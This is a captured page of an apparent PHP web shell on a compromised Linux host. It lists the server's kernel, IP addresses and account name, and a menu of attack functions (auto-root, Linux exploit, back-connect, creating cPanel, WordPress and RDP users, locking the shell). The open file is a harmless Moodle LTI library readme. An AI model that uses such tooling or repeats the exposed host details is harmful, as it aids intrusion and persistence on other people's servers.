Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.90
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
lib /
ltiprovider /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
LICENSE
11.09
KB
-rw-r--r--
README.md
1.98
KB
-rw-r--r--
readme_moodle.txt
2.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
LTI Tool Provider Library PHP ============================= Some changes from the upstream version have been made: * Define consumer profile member variable for ToolConsumer class * Added context type property for Context class * Set context type if 'context_type' parameter was submitted through POST * Do not require tool_consumer_instance_guid * Prevent modification of the request to the provider These changes can be reverted once the following pull requests have been integrated upstream: * https://github.com/IMSGlobal/LTI-Tool-Provider-Library-PHP/pull/10 * https://github.com/IMSGlobal/LTI-Tool-Provider-Library-PHP/pull/11 * https://github.com/IMSGlobal/LTI-Tool-Provider-Library-PHP/pull/47 * https://github.com/IMSGlobal/LTI-Tool-Provider-Library-PHP/pull/48 This local changes can be reverted once it's checked that they are present upstream (note the LTI-Tool-Provider-Library-PHP repo has been archived so it doesn't accept pull requests anymore): * MDL-67034 php74 compliance fixes It is recommended by upstream to install depdencies via composer - but the composer installation is bundled with an autoloader so it's better to do it manually. Information ----------- URL: https://github.com/IMSGlobal/LTI-Tool-Provider-Library-PHP/wiki License: Apache License, Version 2.0 Installation ------------ 1) Download the latest version of the provider library wget https://github.com/IMSGlobal/LTI-Tool-Provider-Library-PHP/archive/3.0.3.zip 2) Unzip the archive unzip 3.0.3.zip 3) Move the source code directory into place mv LTI-Tool-Provider-Library-PHP-3.0.3/* lib/ltiprovider/ 4) Updates Check that the following pull request is included in the release. Then remove this step from this file. https://github.com/IMSGlobal/LTI-Tool-Provider-Library-PHP/pull/13 If not, apply manually. 5) Run unit tests on enrol_lti_testsuite Upgrading Notes --------------- Check if there are any new changes to the database schema. To do this, view the logs since the last release for the data connector base class and the mysql data connector. https://github.com/IMSGlobal/LTI-Tool-Provider-Library-PHP/compare/3.0.2...3.0.3 src/ToolProvider/DataConnector/DataConnector.php src/ToolProvider/DataConnector/DataConnector_mysql.php In case of any changes we may need to update enrol/lti/classes/data_connector.php enrol/lti/db/install.xml enrol/lti/db/upgrade.php
Close